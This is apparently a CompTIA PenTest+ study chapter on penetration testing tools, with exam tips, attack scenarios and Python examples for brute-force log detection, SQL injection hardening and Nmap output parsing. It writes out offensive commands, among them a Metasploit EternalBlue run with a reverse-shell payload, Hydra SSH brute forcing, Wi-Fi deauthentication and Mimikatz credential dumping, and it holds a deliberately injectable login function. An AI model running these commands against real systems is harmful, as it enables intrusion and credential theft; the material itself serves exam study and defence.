This chapter covers the essential tools used in penetration testing, as outlined in CompTIA PenTest+ objective 5.1 (Tools Scripts). You will learn about the categories of tools, their functions, common command-line options, and how to select the appropriate tool for each phase of a penetration test. Approximately 20% of the exam questions relate to tool usage, so mastering this content is critical for success. We will cover scanners, exploitation frameworks, password crackers, wireless tools, web application tools, and more.
Imagine a master carpenter building a custom house. She doesn't just carry a hammer; her toolbox contains dozens of specialized tools, each for a specific task. The tape measure is for reconnaissance—measuring the site and understanding the layout. The circular saw is a scanning tool, quickly cutting through material to reveal structure. For fine work, she uses a chisel and mallet—exploitation tools that precisely remove wood to create joints. The level ensures everything is aligned, like a vulnerability scanner verifying findings. She also carries a stud finder (for enumeration), a pry bar (for privilege escalation), and a set of lock picks (for gaining access). Each tool has a specific purpose, and using the wrong tool—like trying to cut a dovetail joint with a hammer—would ruin the work. Similarly, a penetration tester must select the right tool for each phase: reconnaissance, scanning, exploitation, post-exploitation, and reporting. The carpenter maintains her tools, sharpening blades and calibrating levels, just as a tester updates tool databases and configures scan parameters. The quality of the final build depends on using the right tool correctly. In penetration testing, using the right tool at the right time is the difference between a successful engagement and a failed one.
Overview of Penetration Testing Tools
Penetration testing tools are software applications used to automate and streamline the various phases of a penetration test: reconnaissance, scanning and enumeration, exploitation, post-exploitation, and reporting. The PT0-002 exam expects you to know not only the names of common tools but also their typical use cases, syntax, and output interpretation.
Tools can be categorized by function:
- Reconnaissance Tools: gather information about the target (e.g., WHOIS, nslookup, theHarvester, Recon-ng).
- Scanning Tools: identify live hosts, open ports, and services (e.g., Nmap, Masscan, Unicornscan).
- Enumeration Tools: extract detailed information from services (e.g., enum4linux, smbclient, SNMPwalk).
- Vulnerability Scanners: automatically detect known vulnerabilities (e.g., Nessus, OpenVAS, Qualys).
- Exploitation Frameworks: provide exploits and payloads (e.g., Metasploit, Core Impact, Canvas).
- Password Tools: crack or test passwords (e.g., John the Ripper, Hashcat, Hydra).
- Wireless Tools: assess Wi-Fi security (e.g., Aircrack-ng, Kismet, Reaver).
- Web Application Tools: test web apps (e.g., Burp Suite, OWASP ZAP, Nikto, SQLmap).
- Post-Exploitation Tools: maintain access and pivot (e.g., Mimikatz, PowerSploit, Empire).
- Reporting Tools: generate documentation (e.g., Dradis, Faraday, KeepNote).
Reconnaissance Tools
Reconnaissance is the first phase. Tools like theHarvester collect emails, subdomains, and IPs using search engines. Example:
theHarvester -d example.com -b google
Recon-ng is a full-featured reconnaissance framework with modules for DNS, WHOIS, and social media. WHOIS queries domain registration details. nslookup and dig perform DNS queries. The exam may ask which tool is best for passive reconnaissance (theHarvester) vs. active (nslookup).
Scanning and Enumeration Tools
Nmap is the flagship port scanner. Common options:
- -sS (SYN scan), -sT (TCP connect), -sU (UDP scan)
- -O (OS detection), -sV (version detection)
- -A (aggressive scan combining OS, version, script scanning)
- -p- (all ports)
- --script (run NSE scripts)
Example:
nmap -sS -sV -O -p 1-65535 192.168.1.1
Masscan scans large ranges quickly, claiming to transmit packets at 10 million per second. Unicornscan is another high-performance scanner.
Enumeration tools extract details from services. enum4linux enumerates Windows/Samba shares, users, and policies. smbclient connects to SMB shares. SNMPwalk retrieves SNMP MIB data. dnsrecon performs DNS enumeration.
Nessus is a commercial vulnerability scanner. It uses plugins to check for thousands of vulnerabilities. It requires a license but has a free home edition. OpenVAS (now Greenbone) is open-source. Both perform authenticated and unauthenticated scans. The exam may ask about the difference: Nessus is more polished, OpenVAS is free. Qualys is a cloud-based scanner. All produce a list of vulnerabilities with severity ratings (CVSS).
Exploitation Frameworks
Metasploit Framework is the most common. Its modules are organized by type: exploits, payloads, encoders, and auxiliary modules (scanners, fuzzers, and other non-exploit tasks). Key commands:
- msfconsole starts the interface.
- search finds modules.
- use selects a module.
- set sets options (e.g., RHOSTS, LHOST).
- exploit or run executes.
- sessions lists active sessions.
Example:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.10
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > exploit
Core Impact and Canvas are commercial alternatives. The exam may test that Metasploit is open-source (maintained by Rapid7) and that it is written in Ruby.
Password Tools
John the Ripper cracks password hashes using CPU. Hashcat uses GPU for faster cracking. Both support many hash types (MD5, SHA1, NTLM, etc.). Hydra performs online brute-force attacks against services like SSH, FTP, HTTP. Example:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
CeWL generates custom wordlists from a website. The exam may ask which tool is best for offline cracking (John/Hashcat) vs. online (Hydra).
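The practical difference between online and offline cracking is visibility: every Hydra guess is a real login attempt against a live service, so each one lands in the target's authentication log, whereas offline cracking never touches the target. The following Python example (added here; not from the original page, Hydra, or any other project) shows the defender's side of that distinction: it parses constructed sshd log lines in syslog format and flags any source IP that produces a burst of failed logins inside a sliding time window. The log lines, hostnames, IPs, and thresholds are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines in syslog format (not real log data). The first
# six lines are the footprint an online brute-force tool leaves: one entry per
# guess, all from one source, a second apart. The last two are normal activity.
SAMPLE_LOG = """\
Mar  3 10:15:01 bastion sshd[2101]: Failed password for invalid user admin from 192.168.1.50 port 41022 ssh2
Mar  3 10:15:02 bastion sshd[2103]: Failed password for invalid user admin from 192.168.1.50 port 41024 ssh2
Mar  3 10:15:03 bastion sshd[2105]: Failed password for root from 192.168.1.50 port 41026 ssh2
Mar  3 10:15:04 bastion sshd[2107]: Failed password for invalid user admin from 192.168.1.50 port 41028 ssh2
Mar  3 10:15:05 bastion sshd[2109]: Failed password for root from 192.168.1.50 port 41030 ssh2
Mar  3 10:15:06 bastion sshd[2111]: Failed password for invalid user admin from 192.168.1.50 port 41032 ssh2
Mar  3 10:15:30 bastion sshd[2130]: Failed password for deploy from 10.0.0.7 port 50998 ssh2
Mar  3 10:15:40 bastion sshd[2131]: Accepted password for deploy from 10.0.0.7 port 51000 ssh2
"""

# Matches OpenSSH's "Failed password" line; "invalid user" appears only when
# the account does not exist, so it is optional.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)


def parse_failures(log_text, year=2024):
    """Group (timestamp, username) of failed logins by source IP."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue  # successful logins and unrelated lines are ignored
        # syslog timestamps omit the year, so one is assumed (constructed value)
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        failures[m["src"]].append((ts, m["user"]))
    return failures


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Alert on any source with >= threshold failures inside a sliding window."""
    alerts = []
    for src, events in parse_failures(log_text).items():
        events.sort()
        start, peak = 0, 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans <= window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({
                "src": src,
                "max_failures_in_window": peak,
                "users": sorted({u for _, u in events}),
                "first": events[0][0].isoformat(),
                "last": events[-1][0].isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(f"{alert['src']}: {alert['max_failures_in_window']} failures "
              f"({', '.join(alert['users'])}) between {alert['first']} and {alert['last']}")
```

With the defaults, the single alert names 192.168.1.50, six failures, and the two usernames tried; the lone failure from 10.0.0.7 followed by a success stays below the threshold, which is the trade-off a detection threshold encodes. Lowering `threshold` to 1 turns that ordinary typo into a second alert.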
Wireless Tools
Aircrack-ng suite includes:
- airmon-ng enables monitor mode.
- airodump-ng captures packets.
- aireplay-ng injects packets.
- aircrack-ng cracks WEP/WPA keys.
Example:
airmon-ng start wlan0
airodump-ng wlan0mon
Kismet is a passive wireless sniffer and IDS. Reaver performs WPS brute-force attacks. WiFi Pineapple is a rogue access point tool (hardware). The exam may test that WPA2 cracking requires capturing the 4-way handshake.
Web Application Tools
Burp Suite is an intercepting proxy. Features:
- Proxy: intercepts requests.
- Spider: crawls web apps.
- Scanner: finds vulnerabilities (professional only).
- Intruder: automates attacks (e.g., fuzzing).
- Repeater: manually resends requests.
OWASP ZAP is a free alternative with similar functionality. Nikto is a web server scanner that checks for outdated software and dangerous files. SQLmap automates SQL injection detection and exploitation. Example:
sqlmap -u "http://example.com?id=1" --batch --dbs
Dirb and Gobuster are directory busters. WPScan targets WordPress.
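SQLmap automates the search for one specific coding defect: user input concatenated into SQL text. The Python example below (added here; not from the original page or from the SQLmap project) puts the vulnerable login query beside its hardened form so the remediation the report would recommend is concrete. It uses an in-memory SQLite table with a constructed user row; the only probe string is the textbook `' OR '1'='1`, included to show that the parameterized version treats it as a literal password value.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table for the demonstration.
    The plaintext password column keeps the example short; real applications
    store salted hashes, which does not change the injection point shown here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return conn


def login_vulnerable(conn, username, password):
    """The pattern SQLmap looks for: input is pasted into the SQL string,
    so a quote in the input changes the structure of the WHERE clause."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Hardened form: bound parameters are sent as data, never parsed as SQL.
    Same query shape, but the driver escapes nothing and interprets nothing."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    """Run both versions with valid credentials and with the probe string."""
    conn = make_db()
    probe = "' OR '1'='1"  # textbook probe: turns the AND into "... OR '1'='1'"
    return {
        "vuln_good_creds": login_vulnerable(conn, "alice", "correct-horse"),
        "vuln_probe": login_vulnerable(conn, "alice", probe),
        "safe_good_creds": login_safe(conn, "alice", "correct-horse"),
        "safe_probe": login_safe(conn, "alice", probe),
    }


if __name__ == "__main__":
    for case, authenticated in demo().items():
        print(f"{case:16s} -> {'authenticated' if authenticated else 'rejected'}")
```

The vulnerable function accepts both the real password and the probe, because `password = '' OR '1'='1'` is always true; the parameterized function accepts only the real password. That is the input-validation fix in Scenario 2 in its most reliable form: not filtering quotes, but never letting input reach the SQL parser at all.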
Post-Exploitation Tools
Mimikatz extracts plaintext passwords, hashes, and Kerberos tickets from memory. PowerSploit is a collection of PowerShell scripts for privilege escalation, persistence, and exfiltration. Empire is a post-exploitation framework using PowerShell agents. Cobalt Strike is a commercial tool for adversary simulation (not on exam but related). The exam may ask which tool extracts credentials from LSASS (Mimikatz).
Reporting Tools
Dradis is a collaboration and reporting platform. Faraday integrates with many tools and centralizes findings. KeepNote is a simple note-taking app. The exam may ask about the importance of documenting evidence and screenshots.
Command-Line vs. GUI
The exam emphasizes command-line tools because they are scriptable and efficient. For example, nmap, hydra, sqlmap are CLI. GUI tools like Burp Suite (has CLI options) and Nessus are also used but CLI is preferred for automation.
Tool Selection Criteria
- Phase of test: recon → scanning → exploitation → post-exploitation.
- Target type: web app → Burp; network → Nmap; wireless → Aircrack.
- Environment: Windows vs. Linux; internal vs. external.
- Legal/Authorization: some tools (e.g., Metasploit) can cause damage; ensure proper scope.
Exam Tips
- Know the primary function of each tool.
- Remember common switches (e.g., -sS for SYN scan).
- Understand when to use online vs. offline cracking.
- Be aware of tool limitations (e.g., Masscan is fast but less accurate).
- Practice with virtual labs (e.g., TryHackMe, Hack The Box).
This section provides a foundation; the following step-by-step and real-world sections will deepen your understanding.
Reconnaissance with theHarvester
The first step in any penetration test is passive reconnaissance. Using theHarvester, you gather emails, subdomains, and IP addresses without directly touching the target. The command `theHarvester -d example.com -b google` queries Google's search engine for pages containing `@example.com`. The tool parses results to extract email addresses and hostnames. This information is then used for social engineering or as input for further enumeration. At the protocol level, theHarvester makes HTTPS requests to Google's servers, so no packets are sent to the target itself. This is passive recon—the target has no knowledge of the activity. The output is saved to an HTML or text file for later analysis.
Port Scanning with Nmap
Active reconnaissance begins with Nmap to identify live hosts and open ports. The command `nmap -sS -sV -O -p 1-65535 192.168.1.0/24` performs a SYN scan (`-sS`), version detection (`-sV`), OS detection (`-O`), and scans all 65535 ports. Nmap sends TCP SYN packets to each port. If a SYN-ACK is received, the port is open; if RST, closed; if no response, filtered. Version detection sends additional probes to identified services to determine software versions. OS detection uses TCP/IP stack fingerprinting. The output lists each host with open ports, service versions, and guessed OS. This information guides the exploitation phase.
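The exam also expects you to interpret scan output, and in practice that means reading Nmap's XML report (`-oX`) rather than eyeballing the console. The Python example below (added here; it is not from the original page or from the Nmap project) parses a constructed XML snippet laid out like Nmap's output into the per-host summary described above: live hosts only, open ports with their service banners, and the top OS guess. It also maps Nmap's `reason` strings back to the SYN-scan logic (syn-ack → open, reset → closed, no-response → filtered) and cross-checks them against the reported state. The addresses, ports, and banners in the sample are constructed, not real scan results.

```python
import xml.etree.ElementTree as ET

# How Nmap records the SYN-scan responses described above, as the strings it
# writes in the <state reason="..."> attribute.
REASON_TO_STATE = {
    "syn-ack": "open",         # SYN-ACK came back
    "reset": "closed",         # RST came back
    "no-response": "filtered"  # nothing came back (dropped by a firewall)
}

# Constructed sample in the layout of Nmap's -oX output (not a real scan).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -O -oX - 192.168.1.10-11">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="closed" reason="reset"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="filtered" reason="no-response"/>
      </port>
    </ports>
    <os>
      <osmatch name="Microsoft Windows 7 SP1" accuracy="90"/>
      <osmatch name="Microsoft Windows Server 2008 R2" accuracy="95"/>
    </os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.1.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def state_from_reason(reason):
    """Translate Nmap's reason string into the port state the scan logic implies."""
    return REASON_TO_STATE.get(reason, "unknown")


def parse_nmap_xml(xml_text):
    """Return one dict per live host: address, open ports with banners, best OS guess."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        if host.find("status").get("state") != "up":
            continue  # host never answered the discovery probe
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        open_ports = []
        for port in host.findall("ports/port"):
            state_el = port.find("state")
            state = state_el.get("state")
            # Sanity-check the reported state against the recorded reason
            if state_from_reason(state_el.get("reason")) != state:
                state = "unknown"
            if state != "open":
                continue
            svc = port.find("service")
            banner = "unknown"
            if svc is not None:
                # -sV fills product/version when a probe matched; join what exists
                parts = (svc.get("name"), svc.get("product"), svc.get("version"))
                banner = " ".join(p for p in parts if p)
            open_ports.append({"port": int(port.get("portid")),
                               "proto": port.get("protocol"),
                               "service": banner})
        # -O may list several candidates; keep the one with the highest accuracy
        matches = host.findall("os/osmatch")
        os_guess = (max(matches, key=lambda m: int(m.get("accuracy", 0))).get("name")
                    if matches else "unknown")
        hosts.append({"address": addr, "open_ports": open_ports, "os": os_guess})
    return hosts


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_XML):
        print(f"{h['address']}  ({h['os']})")
        for p in h["open_ports"]:
            print(f"  {p['port']}/{p['proto']:<4} {p['service']}")
```

Run against the sample, the summary lists only 192.168.1.10 with 22/tcp (ssh OpenSSH 7.4) and 445/tcp (microsoft-ds) and the Server 2008 R2 guess; the closed and filtered ports and the down host are dropped, which is exactly the reduction a tester does by hand before moving to enumeration.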
Enumeration with enum4linux
Once open ports are identified, enumeration extracts details from services. For SMB (port 445), enum4linux is used. Command: `enum4linux -a 192.168.1.10`. The `-a` flag performs all enumeration (users, shares, groups, password policy). The tool sends SMB requests to the target, querying for user lists via SAMR, share lists via SMB, and password policy via LSA. At the protocol level, it uses SMB2 or SMB1 depending on what the server supports. The output reveals usernames (e.g., Administrator), shares (e.g., C$), and policy details (e.g., minimum password length). This data is critical for password guessing and privilege escalation.
Vulnerability Scanning with Nessus
With a list of services, a vulnerability scanner like Nessus identifies known flaws. The tester configures a scan policy (e.g., 'Basic Network Scan') and targets the IP range. Nessus performs a series of probes: it sends packets to each open port and compares responses against a plugin database. For example, plugin 12345 checks for MS17-010 (EternalBlue). If the target responds with a vulnerable SMB version, Nessus flags it as Critical. The scan can be authenticated (using credentials) for deeper checks. The output is a report listing vulnerabilities with CVSS scores, descriptions, and remediation steps. The tester then prioritizes high-severity issues for exploitation.
Exploitation with Metasploit
Using the vulnerability information, the tester launches an exploit via Metasploit. For example, `use exploit/windows/smb/ms17_010_eternalblue` selects the EternalBlue exploit. The tester sets `RHOSTS` to the target IP and `PAYLOAD` to `windows/x64/meterpreter/reverse_tcp`. When `exploit` is run, Metasploit sends a malicious SMB packet to the target that triggers a buffer overflow. The payload executes, opening a reverse connection back to the tester's machine. A Meterpreter session is established, providing interactive access. The session can be used to execute commands, upload/download files, and pivot to other hosts.
Post-Exploitation with Mimikatz
Once a Meterpreter session is obtained, the tester loads Mimikatz to extract credentials. In Meterpreter, run `load mimikatz` then `msv` to dump password hashes from LSASS memory. Mimikatz accesses the Windows Local Security Authority Subsystem Service (LSASS) process, which stores authentication credentials. At the kernel level, it uses techniques like `sekurlsa::logonpasswords` to retrieve plaintext passwords and NTLM hashes from memory. The output includes usernames and their password hashes. These can be used for pass-the-hash attacks or cracked offline. This step demonstrates the full attack chain from recon to credential theft.
Scenario 1: Internal Network Penetration Test for a Financial Institution
A penetration tester is hired to assess a bank's internal network. The tester starts with passive reconnaissance using theHarvester to find employee emails for phishing simulations. Then, Nmap scans the internal IP range 10.0.0.0/8. The scan reveals a legacy Windows Server 2008 R2 with SMB port 445 open. Enumeration with enum4linux shows a guest account with no password. The tester uses Nessus to scan the server, which confirms it is vulnerable to EternalBlue (MS17-010). Exploitation with Metasploit yields a SYSTEM-level shell. Post-exploitation with Mimikatz extracts domain admin credentials from LSASS. The tester uses these to move laterally to the domain controller, demonstrating complete compromise. The report highlights the need to patch SMB, disable guest accounts, and implement least privilege.
Scenario 2: Web Application Assessment for an E-commerce Site
A tester performs a web application test on an e-commerce platform. Using Burp Suite, the tester intercepts traffic and discovers a vulnerable parameter in the login form. SQLmap is used to automate SQL injection, dumping the database containing customer credit card numbers. The tester also uses Nikto to find outdated software versions and Dirb to discover hidden admin panels. The results show that the site is running an old PHP version with known RCE vulnerabilities. The tester exploits this with Metasploit to gain a web shell. Post-exploitation includes using PowerSploit to enumerate the network and exfiltrate data. The report recommends input validation, updating software, and removing unnecessary files.
Scenario 3: Wireless Security Audit for a Corporate Office
A tester evaluates the Wi-Fi security of a company. Using Aircrack-ng, the tester puts the wireless card in monitor mode with airmon-ng start wlan0. Airodump-ng captures packets on the target SSID. The tester captures a WPA2 4-way handshake by deauthenticating a client with aireplay-ng -0 1 -a [BSSID] -c [client MAC] wlan0mon. The handshake is then cracked using Hashcat with a wordlist. The password is found to be 'Password123'. The tester also uses Reaver to attempt WPS pin attacks, which succeeds on a router with WPS enabled. The report advises disabling WPS, using strong passwords, and implementing 802.1X authentication.
Common misconfigurations include default credentials, unpatched systems, and weak encryption. Performance considerations: large-scale scans (e.g., 10,000 hosts) require tools like Masscan; Nessus scans can overwhelm network bandwidth; Metasploit exploits may crash services. Always have a rollback plan and test in a lab first.
The PT0-002 exam tests tools under Objective 5.1: 'Given a scenario, apply the appropriate tool to perform a penetration test.' You must know the primary function of each tool and when to use it. Common wrong answers include:
Confusing scanning and enumeration tools: Candidates often pick Nmap for enumeration (e.g., extracting usernames) when the correct tool is enum4linux. Remember: Nmap scans ports; enum4linux enumerates SMB details.
Selecting the wrong password tool: For offline cracking of NTLM hashes, John the Ripper is correct, but candidates choose Hydra (online brute-force). Tip: offline = John/Hashcat; online = Hydra/Medusa.
Mixing up wireless tools: Airodump-ng captures packets, but candidates think it cracks keys (that's aircrack-ng). Know the suite: airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (injection), aircrack-ng (cracking).
Web tool confusion: Burp Suite is for intercepting and modifying HTTP traffic; Nikto is a web server scanner; SQLmap automates SQL injection. The exam may ask: 'Which tool would you use to test for SQL injection?' Answer: SQLmap, not Burp (though Burp can be used manually).
Specific numbers/values to remember:
- Nmap SYN scan: -sS
- Metasploit: use, set, exploit
- Hashcat: -m for hash type (e.g., 1000 for NTLM)
- John the Ripper: --format to specify hash type
- Hydra: -l for username, -P for password list
Edge cases:
- If a target has a firewall, Nmap's SYN scan may show ports as filtered; try -sT (TCP connect) instead.
- For web apps with CSRF tokens, Burp's Intruder may need macros to handle tokens.
- For WPA2 cracking, if no handshake is captured, you cannot crack; the exam may ask: 'What must be captured?' Answer: 4-way handshake.
Elimination strategy: Read the scenario carefully. Identify the phase (recon, scanning, exploitation, etc.) and the specific task (e.g., 'identify open ports' → Nmap; 'extract user list from SMB' → enum4linux). Eliminate tools that do something else. For example, if the task is 'crack password hashes offline', eliminate Hydra (online) and Nmap (scanning).
Nmap SYN scan: nmap -sS target; version detection: -sV; OS detection: -O; aggressive: -A.
Metasploit commands: use [module], set [option] [value], exploit.
John the Ripper cracks hashes offline; Hydra performs online brute-force.
Aircrack-ng suite: airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (injection), aircrack-ng (cracking).
Burp Suite is an intercepting proxy; OWASP ZAP is a free scanner.
SQLmap automates SQL injection detection and exploitation.
enum4linux enumerates SMB users, shares, and policies.
Mimikatz extracts passwords from LSASS memory.
Hashcat uses GPU for faster cracking; use -m for hash type.
Always match the tool to the phase: recon → theHarvester; scanning → Nmap; exploitation → Metasploit; post-exploitation → Mimikatz.
These come up on the exam all the time. Here's how to tell them apart.
Nmap
Slower but more accurate and feature-rich.
Supports OS detection, version detection, and NSE scripts.
Default scan rate is low; can be increased with -T4 or -T5.
Widely used for detailed service enumeration.
Output includes hostnames, OS, and service versions.
Masscan
Extremely fast, designed for scanning large IP ranges (e.g., entire internet).
Limited to port scanning; no OS/version detection by default.
Can transmit up to 10 million packets per second.
Useful for initial broad scans to find live hosts.
Output is minimal; often used with Nmap for follow-up.
John the Ripper
CPU-based cracking (can use GPU with John's community patches).
Supports many hash formats including dynamic formats.
Slower than Hashcat on GPU.
Built-in wordlist and mangling rules.
Often used in older Linux distributions.
Hashcat
GPU-accelerated cracking; much faster for most hash types.
Supports a wide range of hash types with specific mode numbers (e.g., -m 1000 for NTLM).
Requires compatible GPU and drivers.
Can use mask attacks and rule-based attacks.
Industry standard for high-speed password cracking.
Burp Suite (Free)
Intercepting proxy with manual testing features.
Intruder for automated fuzzing (rate-limited in free).
Repeater for manual request resending.
No automated vulnerability scanner in free edition.
Java-based, can be slower on some systems.
OWASP ZAP
Full-featured free and open-source web app scanner.
Automated spidering and active scanning (AJAX spider included).
Passive scanning for common issues.
Built-in support for WebSocket testing.
Easier to set up and use for beginners.
Mistake
Nmap can enumerate usernames from an SMB server.
Correct
Nmap scans ports and detects services, but it does not enumerate SMB users. Use enum4linux or smbclient for that purpose.
Mistake
Hydra is used for offline password cracking.
Correct
Hydra performs online brute-force attacks against live services. Offline cracking of hashes is done with John the Ripper or Hashcat.
Mistake
Aircrack-ng is used to capture packets.
Correct
Aircrack-ng cracks WEP/WPA keys from captured packets. Packet capture is done by airodump-ng.
Mistake
Burp Suite is a vulnerability scanner that automatically finds all web vulnerabilities.
Correct
Burp Suite's scanner is only in the professional edition; the free edition is an intercepting proxy. OWASP ZAP is a free alternative with scanning.
Mistake
Metasploit is only for exploitation.
Correct
Metasploit includes auxiliary modules for scanning and enumeration, such as port scanners and SMB version detection.
Nmap is the standard tool for port scanning. It offers various scan types (SYN, TCP connect, UDP), OS detection, version detection, and scriptable scanning via NSE. For large ranges, Masscan is faster but less detailed. On the exam, if the scenario requires detailed service identification, choose Nmap.
First, capture the 4-way handshake using airodump-ng. Then use aircrack-ng or Hashcat to crack the handshake file. Example: aircrack-ng -w wordlist.txt capture.cap. Hashcat is faster: hashcat -m 22000 capture.hccapx wordlist.txt.
John the Ripper is CPU-based and supports many hash formats. Hashcat is GPU-accelerated and much faster for most hashes. Hashcat uses mode numbers (e.g., -m 1000 for NTLM). Both are offline crackers. On the exam, if speed is needed, choose Hashcat.
SQLmap is the primary tool for automating SQL injection detection and exploitation. It supports many database types and can dump data. Burp Suite can also manually test SQLi, but SQLmap is automated.
enum4linux enumerates information from Windows and Samba systems via SMB. It extracts user lists, share lists, group memberships, and password policy. It uses RPC calls to query the target.
Start msfconsole, search for an exploit (search eternalblue), use it (use exploit/windows/smb/ms17_010_eternalblue), set required options (set RHOSTS target_ip, set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST your_ip), then run exploit. A session opens if successful.
Burp Suite (free) is an intercepting proxy with manual tools; its automated scanner is only in the professional edition. OWASP ZAP is free and includes an automated scanner, spider, and AJAX spider. ZAP is easier for beginners; Burp is more common in professional environments.